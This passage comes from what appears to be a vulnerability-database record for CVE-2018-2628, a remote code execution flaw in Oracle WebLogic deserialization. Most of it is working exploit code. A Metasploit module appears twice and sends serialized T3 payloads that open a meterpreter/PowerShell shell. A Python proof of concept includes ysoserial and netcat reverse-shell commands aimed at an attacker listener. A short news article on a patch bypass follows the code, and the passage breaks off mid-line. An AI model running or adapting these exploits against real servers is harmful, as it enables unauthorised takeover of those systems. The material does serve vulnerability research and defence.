@resp << '6f6c647078703f40000000000000770800000010000000007878767200126a61'\n @resp << '76612e6c616e672e4f7665727269646500000000000000000000007078707100'\n @resp << '7e005a'\n end\n\n def on_client_connect(client)\n # Make sure to only sent one meterpreter payload to a host.\n 
# During testing the remote host called back up to 11 times\n # (or as long as the server was listening).\n vprint_status(\"Comparing host: #{client.peerhost}\")\n if @met_sent.include?(client.peerhost) then return end\n @met_sent << client.peerhost\n\n vprint_status(\"Sending payload to client: #{client.peerhost}\")\n\n # Response format determined by watching network traffic\n # generated by EDB PoC\n accept_conn = '4e00'\n raccept_conn = client.peerhost.each_byte.map {|b| b.to_s(16)}.join\n accept_conn << (raccept_conn.length >> 1).to_s(16).rjust(2,'0')\n accept_conn << raccept_conn\n accept_conn << '0000'\n accept_conn << client.peerport.to_s(16).rjust(4,'0')\n\n client.put([accept_conn].pack('H*'))\n client.put([@resp].pack('H*'))\n end\n\n def t3_handshake\n shake = '74332031322e322e310a41533a323535'\n shake << '0a484c3a31390a4d533a313030303030'\n shake << '30300a0a'\n\n sock.put([shake].pack('H*'))\n sleep(1)\n sock.get_once\n end\n\n def build_t3_request_object\n # data block is from EDB PoC\n data = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a'\n data << '56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278'\n data << '700000000a000000030000000000000006007070707070700000000a00000003'\n data << '0000000000000006007006fe010000aced00057372001d7765626c6f6769632e'\n data << '726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078'\n data << '707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e506163'\n data << '6b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d69'\n data << '6e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b'\n data << '5a000e74656d706f7261727950617463684c0009696d706c5469746c65740012'\n data << '4c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271'\n data << '007e00034c000b696d706c56657273696f6e71007e000378707702000078fe01'\n data << '0000aced00057372001d7765626c6f6769632e726a766d2e436c617373546162'\n data << 
'6c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e'\n data << '636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f9722455164'\n data << '52463e0200035b00087061636b616765737400275b4c7765626c6f6769632f63'\n data << '6f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e7265'\n data << '6c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e67'\n data << '3b5b001276657273696f6e496e666f417342797465737400025b427872002477'\n data << '65626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b61676549'\n data << '6e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f724900'\n data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'\n data << '6d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a'\n data << '696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e'\n data << '000478707702000078fe010000aced00057372001d7765626c6f6769632e726a'\n data << '766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c0000787072'\n data << '00217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5065657249'\n data << '6e666f585474f39bc908f10200064900056d616a6f724900056d696e6f724900'\n data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'\n data << '6d706f7261727950617463685b00087061636b616765737400275b4c7765626c'\n data << '6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f'\n data << '3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5665'\n data << '7273696f6e496e666f972245516452463e0200035b00087061636b6167657371'\n data << '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c61'\n data << '6e672f537472696e673b5b001276657273696f6e496e666f4173427974657374'\n data << '00025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c'\n data << '2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f7249'\n data << '00056d696e6f7249000c726f6c6c696e67506174636849000b73657276696365'\n data << '5061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c'\n data 
<< '6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56'\n data << '657273696f6e71007e000578707702000078fe00fffe010000aced0005737200'\n data << '137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078'\n data << '707750210000000000000000000d3139322e3136382e312e323237001257494e'\n data << '2d4147444d565155423154362e656883348cd6000000070000'\n\n data << rport.to_s(16).rjust(4, '0')\n\n data << 'ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced00'\n data << '05737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a'\n data << '0c0000787077200114dc42bd071a7727000d3234322e3231342e312e32353461'\n data << '863d1d0000000078'\n\n sock.put([data].pack('H*'))\n sleep(2)\n sock.get_once\n end\n\n def send_payload_objdata\n # JRMPClient2 payload generated from EDB PoC:\n # python exploit.py <rhost> <rport> ysoserial-0.0.6-SNAPSHOT-BETA-all.jar <lhost> <lport> JRMPClient2\n # Patch in srvhost and srvport\n payload = '056508000000010000001b0000005d0101007372017870737202787000000000'\n payload << '00000000757203787000000000787400087765626c6f67696375720478700000'\n payload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced'\n payload << '00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e'\n payload << '7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e0020000'\n payload << '78707702000078fe010000aced00057372001d7765626c6f6769632e726a766d'\n payload << '2e436c6173735461626c65456e7472792f52658157f4f9ed0c00007870720013'\n payload << '5b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c0200007870'\n payload << '7702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e43'\n payload << '6c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a61'\n payload << '76612e7574696c2e566563746f72d9977d5b803baf0103000349001163617061'\n payload << '63697479496e6372656d656e7449000c656c656d656e74436f756e745b000b65'\n payload << '6c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b'\n payload << 
'78707702000078fe010000'\n\n # Data\n payload << 'aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e'\n payload << '416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50'\n payload << '726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e67'\n payload << '2f7265666c6563742f496e766f636174696f6e48616e646c65723b7870737200'\n payload << '2d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e76'\n payload << '6f636174696f6e48616e646c657200000000000000020200007872001c6a6176'\n payload << '612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c6133'\n payload << '1e030000787077'\n\n unicast_srvhost = srvhost.each_byte.map { |b| b.to_s(16) }.join\n unicast_dat = '000a556e696361737452656600'\n unicast_dat << (unicast_srvhost.length >> 1).to_s(16).rjust(2,'0')\n unicast_dat << unicast_srvhost\n unicast_dat << '0000'\n unicast_dat << srvport.to_s(16).rjust(4,'0')\n unicast_dat << '000000004e18654b000000000000000000000000000000'\n unicast_dat << '78'\n\n payload << ((unicast_dat.length >> 1) - 1).to_s(16).rjust(2,'0')\n payload << unicast_dat\n\n payload << 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461'\n payload << '626c6553657276696365436f6e74657874ddcba8706386f0ba0c000078720029'\n payload << '7765626c6f6769632e726d692e70726f76696465722e42617369635365727669'\n payload << '6365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765'\n payload << '626c6f6769632e726d692e696e7465726e616c2e4d6574686f64446573637269'\n payload << '70746f7212485a828af7f67b0c000078707734002e61757468656e7469636174'\n payload << '65284c7765626c6f6769632e73656375726974792e61636c2e55736572496e66'\n payload << '6f3b290000001b7878fe00ff'\n\n data = ((payload.length >> 1) + 4).to_s(16).rjust(8,'0')\n data << payload\n\n sock.put([data].pack('H*'))\n sleep(1)\n sock.put([data].pack('H*'))\n sleep(1)\n sock.get_once\n end\n\n def exploit\n @met_sent = []\n gen_resp\n\n connect\n vprint_status('Sending handshake...')\n t3_handshake\n\n 
build_t3_request_object\n\n start_service\n\n print_status('Sending client object payload...')\n send_payload_objdata\n\n # Need to wait this long to make sure we get a shell back\n sleep(10)\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/misc/weblogic_deserialize.rb"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:39", "description": "\nOracle Weblogic Server 10.3.6.0 12.1.3.0 12.2.1.2 12.2.1.3 - Deserialization Remote Command Execution", "edition": 1, "published": "2018-04-22T00:00:00", "title": "Oracle Weblogic Server 10.3.6.0 12.1.3.0 12.2.1.2 12.2.1.3 - Deserialization Remote Command Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-2628"], "modified": "2018-04-22T00:00:00", "id": "EXPLOITPACK:4E686858C529C5DA732FBC1E25A496DB", "href": "", "sourceData": "# -*- coding: utf-8 -*-\n# Oracle Weblogic Server (10.3.6.0, 12.1.3.0, 12.2.1.2, 12.2.1.3) Deserialization Remote Command Execution Vulnerability (CVE-2018-2628)\n#\n# IMPORTANT: Is provided only for educational or information purposes.\n#\n# Credit: Thanks by Liao Xinxi of NSFOCUS Security Team\n# Reference: http://mp.weixin.qq.com/s/nYY4zg2m2xsqT0GXa9pMGA\n#\n# How to exploit:\n# 1. run below command on JRMPListener host\n# 1) wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar\n# 2) java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]\n# e.g. java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'nc -nv 10.0.0.5 4040'\n# 2. start a listener on attacker host\n# e.g. nc -nlvp 4040\n# 3. 
run this script on attacker host\n# 1) wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar\n# 2) python exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]\n# e.g.\n# a) python exploit.py 10.0.0.11 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 10.0.0.5 1099 JRMPClient (Using java.rmi.registry.Registry)\n# b) python exploit.py 10.0.0.11 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 10.0.0.5 1099 JRMPClient2 (Using java.rmi.activation.Activator)\n\nfrom __future__ import print_function\n\nimport binascii\nimport os\nimport socket\nimport sys\nimport time\n\n\ndef generate_payload(path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client):\n #generates ysoserial payload\n command = 'java -jar {} {} {}:{} > payload.out'.format(path_ysoserial, jrmp_client, jrmp_listener_ip, jrmp_listener_port)\n print(\"command: \" + command)\n os.system(command)\n bin_file = open('payload.out','rb').read()\n return binascii.hexlify(bin_file)\n\n\ndef t3_handshake(sock, server_addr):\n sock.connect(server_addr)\n sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))\n time.sleep(1)\n sock.recv(1024)\n print('handshake successful')\n\n\ndef build_t3_request_object(sock, port):\n data1 = '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'\n data2 = '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{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(dport))\n data3 = '1a7727000d3234322e323134'\n data4 = '2e312e32353461863d1d0000000078'\n for d in [data1,data2,data3,data4]:\n sock.send(d.decode('hex'))\n time.sleep(2)\n print('send request payload successful,recv length:%d'%(len(sock.recv(2048))))\n\n\ndef send_payload_objdata(sock, data):\n 
payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'\n payload+=data\n payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'\n payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)\n sock.send(payload.decode('hex'))\n time.sleep(2)\n sock.send(payload.decode('hex'))\n res = ''\n try:\n while True:\n res += sock.recv(4096)\n time.sleep(0.1)\n except Exception:\n pass\n return res\n\n\ndef exploit(dip, dport, path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.settimeout(65)\n server_addr = (dip, dport)\n t3_handshake(sock, server_addr)\n build_t3_request_object(sock, dport)\n payload = generate_payload(path_ysoserial, jrmp_listener_ip, jrmp_listener_port, 
jrmp_client)\n print(\"payload: \" + payload)\n rs=send_payload_objdata(sock, payload)\n print('response: ' + rs)\n print('exploit completed!')\n\n\nif __name__==\"__main__\":\n #check for args, print usage if incorrect\n if len(sys.argv) != 7:\n print('\\nUsage:\\nexploit.py [victim ip] [victim port] [path to ysoserial] '\n '[JRMPListener ip] [JRMPListener port] [JRMPClient]\\n')\n sys.exit()\n\n dip = sys.argv[1]\n dport = int(sys.argv[2])\n path_ysoserial = sys.argv[3]\n jrmp_listener_ip = sys.argv[4]\n jrmp_listener_port = sys.argv[5]\n jrmp_client = sys.argv[6]\n exploit(dip, dport, path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client)", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2018-05-06T20:36:09", "bulletinFamily": "info", "cvelist": ["CVE-2018-2628"], "description": "[](<https://1.bp.blogspot.com/-9J8Q80vtoRQ/WucbFOd4joI/AAAAAAAAweI/PzSpfD_3wXQWLKjTW_qEpQzFlHTrd9QigCLcBGAs/s728-e20/oracle-weblogic-server-deserialization-remote-command-execution.png>)\n\nEarlier this month, Oracle [patched](<http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html>) a highly critical Java deserialization remote code execution vulnerability in its WebLogic Server component of Fusion Middleware that could allow attackers to easily gain complete control of a vulnerable server. \n \nHowever, a security researcher, who operates through the Twitter handle @pyn3rd and claims to be part of the Alibaba security team, has now [found](<https://twitter.com/pyn3rd/status/990114565219344384>) a way using which attackers can bypass the security patch and exploit the WebLogic vulnerability once again. \n\n\n \nWebLogic Server acts as a middle layer between the front end user interface and the backend database of a multi-tier enterprise application. It provides a complete set of services for all components and handles details of the application behavior automatically. 
\n \nInitially discovered in November last year by [Liao Xinxi](<https://mp.weixin.qq.com/s/nYY4zg2m2xsqT0GXa9pMGA>) of the NSFOCUS security team, the Oracle WebLogic Server flaw (CVE-2018-2628) can be exploited with network access over TCP port 7001. \n\n\nIf exploited successfully, the flaw could allow a remote attacker to completely take over a vulnerable Oracle WebLogic Server. The vulnerability affects versions 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3. \n \nSince a proof-of-concept ([PoC](<https://github.com/brianwrf/CVE-2018-2628>)) exploit for the original Oracle WebLogic Server vulnerability has already been made public on GitHub, and someone has now bypassed the patch as well, your up-to-date services are again at risk of being hacked. \n\n\n \nAlthough @pyn3rd has only released a short GIF (video) as a proof-of-concept (PoC) instead of releasing full bypass code or any technical details, it would hardly take more than a few hours or days for skilled hackers to figure out a way to achieve the same. \n \nCurrently, it is unclear when Oracle will release a new security update to address this issue, which has re-opened the CVE-2018-2628 flaw. 
\n \nIn order to be at least one-step safer, it is still advisable to install April patch update released by Oracle, if you haven't yet because attackers have already [started scanning](<https://twitter.com/GreyNoiseIO/status/988685136035307520>) the Internet for vulnerable WebLogic servers.\n", "modified": "2018-04-30T13:39:31", "published": "2018-04-30T02:36:00", "id": "THN:B899834FCFF1D593C20E11F19F0E6769", "href": "https://thehackernews.com/2018/04/oracle-weblogic-rce-exploit.html", "type": "thn", "title": "Faulty Patch for Oracle WebLogic Flaw Opens Updated Servers to Hackers Again", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2018-08-11T09:54:16", "description": "", "published": "2018-08-10T00:00:00", "type": "packetstorm", "title": "Oracle Weblogic Server Deserialization Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-2628"], "modified": "2018-08-10T00:00:00", "id": "PACKETSTORM:148878", "href": "https://packetstormsecurity.com/files/148878/Oracle-Weblogic-Server-Deserialization-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core/exploit/powershell' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ManualRanking \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::Remote::TcpServer \ninclude Msf::Exploit::Powershell \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => 'Oracle Weblogic Server Deserialization RCE', \n'Description' => %q{ \nAn unauthenticated attacker with network access to the Oracle Weblogic \nServer T3 interface can send a serialized object to the interface to \nexecute code on vulnerable hosts. 
\n}, \n'Author' => \n[ \n'brianwrf', # EDB PoC \n'Jacob Robles' # Metasploit Module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2018-2628'], \n['EDB', '44553'] \n], \n'Privileged' => false, \n'Targets' => \n[ \n[ 'Windows', \n{ \n'Platform' => ['win'] \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => \n{ \n'RPORT' => 7001 \n}, \n'DisclosureDate' => 'Apr 17 2018')) \nend \n \ndef gen_resp \npwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first) \npwrshl.gsub!(\"%COMSPEC%\", \"cmd.exe\") \ntmp_dat = pwrshl.each_byte.map {|b| b.to_s(16)}.join \n \nmycmd = (tmp_dat.length >> 1).to_s(16).rjust(4,'0') \nmycmd << tmp_dat \n \n# Response data taken from JRMPListener generated data: \n# java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener <lport> CommonsCollections1 'calc.exe' \n# Modified captured network traffic bytes. Patch in command to run \n@resp = '51aced0005770f02086f5ef3000001651a67984d80017372002e6a617661782e' \n@resp << '6d616e6167656d656e742e42616441747472696275746556616c756545787045' \n@resp << '7863657074696f6ed4e7daab632d46400200014c000376616c7400124c6a6176' \n@resp << '612f6c616e672f4f626a6563743b70787200136a6176612e6c616e672e457863' \n@resp << '657074696f6ed0fd1f3e1a3b1cc402000070787200136a6176612e6c616e672e' \n@resp << '5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c' \n@resp << '6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d6573' \n@resp << '736167657400124c6a6176612f6c616e672f537472696e673b5b000a73746163' \n@resp << '6b547261636574001e5b4c6a6176612f6c616e672f537461636b547261636545' \n@resp << '6c656d656e743b4c001473757070726573736564457863657074696f6e737400' \n@resp << '104c6a6176612f7574696c2f4c6973743b70787071007e0008707572001e5b4c' \n@resp << '6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c' \n@resp << '3cfd2239020000707870000000047372001b6a6176612e6c616e672e53746163' \n@resp << 
'6b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e' \n@resp << '756d6265724c000e6465636c6172696e67436c61737371007e00054c00086669' \n@resp << '6c654e616d6571007e00054c000a6d6574686f644e616d6571007e0005707870' \n@resp << '0000011b74001e79736f73657269616c2e6578706c6f69742e4a524d504c6973' \n@resp << '74656e65727400114a524d504c697374656e65722e6a617661740006646f4361' \n@resp << '6c6c7371007e000b000000e071007e000d71007e000e740009646f4d65737361' \n@resp << '67657371007e000b000000ab71007e000d71007e000e74000372756e7371007e' \n@resp << '000b0000007771007e000d71007e000e7400046d61696e737200266a6176612e' \n@resp << '7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c6973' \n@resp << '74fc0f2531b5ec8e100200014c00046c69737471007e0007707872002c6a6176' \n@resp << '612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c6543' \n@resp << '6f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a617661' \n@resp << '2f7574696c2f436f6c6c656374696f6e3b707870737200136a6176612e757469' \n@resp << '6c2e41727261794c6973747881d21d99c7619d03000149000473697a65707870' \n@resp << '000000007704000000007871007e001b787372003273756e2e7265666c656374' \n@resp << '2e616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f6e' \n@resp << '48616e646c657255caf50f15cb7ea50200024c000c6d656d62657256616c7565' \n@resp << '7374000f4c6a6176612f7574696c2f4d61703b4c0004747970657400114c6a61' \n@resp << '76612f6c616e672f436c6173733b707870737d00000001000d6a6176612e7574' \n@resp << '696c2e4d617074001066696c653a2f746d702f73732e6a6172787200176a6176' \n@resp << '612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c' \n@resp << '0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174' \n@resp << '696f6e48616e646c65723b7078707371007e001c7372002a6f72672e61706163' \n@resp << '68652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d' \n@resp << '61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f61' \n@resp << 
'70616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e7366' \n@resp << '6f726d65723b74001066696c653a2f746d702f73732e6a617278707372003a6f' \n@resp << '72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6675' \n@resp << '6e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97' \n@resp << '040200015b000d695472616e73666f726d65727374002d5b4c6f72672f617061' \n@resp << '6368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f72' \n@resp << '6d65723b74001066696c653a2f746d702f73732e6a617278707572002d5b4c6f' \n@resp << '72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472' \n@resp << '616e73666f726d65723bbd562af1d834189902000074001066696c653a2f746d' \n@resp << '702f73732e6a61727870000000057372003b6f72672e6170616368652e636f6d' \n@resp << '6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e737461' \n@resp << '6e745472616e73666f726d6572587690114102b1940200014c000969436f6e73' \n@resp << '74616e7471007e000174001066696c653a2f746d702f73732e6a617278707672' \n@resp << '00116a6176612e6c616e672e52756e74696d6500000000000000000000007078' \n@resp << '707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c65637469' \n@resp << '6f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287' \n@resp << 'e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e67' \n@resp << '2f4f626a6563743b4c000b694d6574686f644e616d6571007e00055b000b6950' \n@resp << '6172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7400' \n@resp << '1066696c653a2f746d702f73732e6a61727870757200135b4c6a6176612e6c61' \n@resp << '6e672e4f626a6563743b90ce589f1073296c0200007078700000000274000a67' \n@resp << '657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab' \n@resp << '16d7aecbcd5a99020000707870000000007400096765744d6574686f64757100' \n@resp << '7e003e00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a' \n@resp << '3bb3420200007078707671007e003e7371007e00367571007e003b0000000270' \n@resp << 
'7571007e003b00000000740006696e766f6b657571007e003e00000002767200' \n@resp << '106a6176612e6c616e672e4f626a656374000000000000000000000070787076' \n@resp << '71007e003b7371007e0036757200135b4c6a6176612e6c616e672e537472696e' \n@resp << '673badd256e7e91d7b470200007078700000000174' \n \n@resp << mycmd \n \n@resp << '74' \n@resp << '0004657865637571007e003e0000000171007e00437371007e0031737200116a' \n@resp << '6176612e6c616e672e496e746567657212e2a0a4f78187380200014900057661' \n@resp << '6c756570787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b' \n@resp << '02000070787000000001737200116a6176612e7574696c2e486173684d617005' \n@resp << '07dac1c31660d103000246000a6c6f6164466163746f72490009746872657368' \n@resp << '6f6c647078703f40000000000000770800000010000000007878767200126a61' \n@resp << '76612e6c616e672e4f7665727269646500000000000000000000007078707100' \n@resp << '7e005a' \nend \n \n \ndef on_client_connect(client) \n# Make sure to only sent one meterpreter payload to a host. \n# During testing the remote host called back up to 11 times \n# (or as long as the server was listening). 
\nvprint_status(\"Comparing host: #{client.peerhost}\") \nif @met_sent.include?(client.peerhost) then return end \n@met_sent << client.peerhost \n \nvprint_status(\"met_sent: #{@met_sent}\") \n \n# Response format determined by watching network traffic \n# generated by EDB PoC \naccept_conn = '4e00' \nraccept_conn = client.peerhost.each_byte.map {|b| b.to_s(16)}.join \naccept_conn << (raccept_conn.length >> 1).to_s(16).rjust(2,'0') \naccept_conn << raccept_conn \naccept_conn << '0000' \naccept_conn << client.peerport.to_s(16).rjust(4,'0') \n \nclient.put([accept_conn].pack('H*')) \nclient.put([@resp].pack('H*')) \nend \n \ndef t3_handshake \nshake = '74332031322e322e310a41533a323535' \nshake << '0a484c3a31390a4d533a313030303030' \nshake << '30300a0a' \n \nsock.put([shake].pack('H*')) \nsleep(1) \nsock.get_once \nend \n \ndef build_t3_request_object \n# data block is from EDB PoC \ndata = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a' \ndata << '56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278' \ndata << '700000000a000000030000000000000006007070707070700000000a00000003' \ndata << '0000000000000006007006fe010000aced00057372001d7765626c6f6769632e' \ndata << '726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078' \ndata << '707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e506163' \ndata << '6b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d69' \ndata << '6e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b' \ndata << '5a000e74656d706f7261727950617463684c0009696d706c5469746c65740012' \ndata << '4c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271' \ndata << '007e00034c000b696d706c56657273696f6e71007e000378707702000078fe01' \ndata << '0000aced00057372001d7765626c6f6769632e726a766d2e436c617373546162' \ndata << '6c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e' \ndata << '636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f9722455164' \ndata << 
'52463e0200035b00087061636b616765737400275b4c7765626c6f6769632f63' \ndata << '6f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e7265' \ndata << '6c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e67' \ndata << '3b5b001276657273696f6e496e666f417342797465737400025b427872002477' \ndata << '65626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b61676549' \ndata << '6e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f724900' \ndata << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465' \ndata << '6d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a' \ndata << '696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e' \ndata << '000478707702000078fe010000aced00057372001d7765626c6f6769632e726a' \ndata << '766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c0000787072' \ndata << '00217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5065657249' \ndata << '6e666f585474f39bc908f10200064900056d616a6f724900056d696e6f724900' \ndata << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465' \ndata << '6d706f7261727950617463685b00087061636b616765737400275b4c7765626c' \ndata << '6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f' \ndata << '3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5665' \ndata << '7273696f6e496e666f972245516452463e0200035b00087061636b6167657371' \ndata << '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c61' \ndata << '6e672f537472696e673b5b001276657273696f6e496e666f4173427974657374' \ndata << '00025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c' \ndata << '2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f7249' \ndata << '00056d696e6f7249000c726f6c6c696e67506174636849000b73657276696365' \ndata << '5061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c' \ndata << '6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56' \ndata << '657273696f6e71007e000578707702000078fe00fffe010000aced0005737200' \ndata 
